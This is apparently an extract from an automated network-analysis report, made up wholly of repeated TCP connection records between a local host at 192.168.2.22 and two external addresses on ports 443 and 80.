                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global traffic  TCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global traffic  TCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
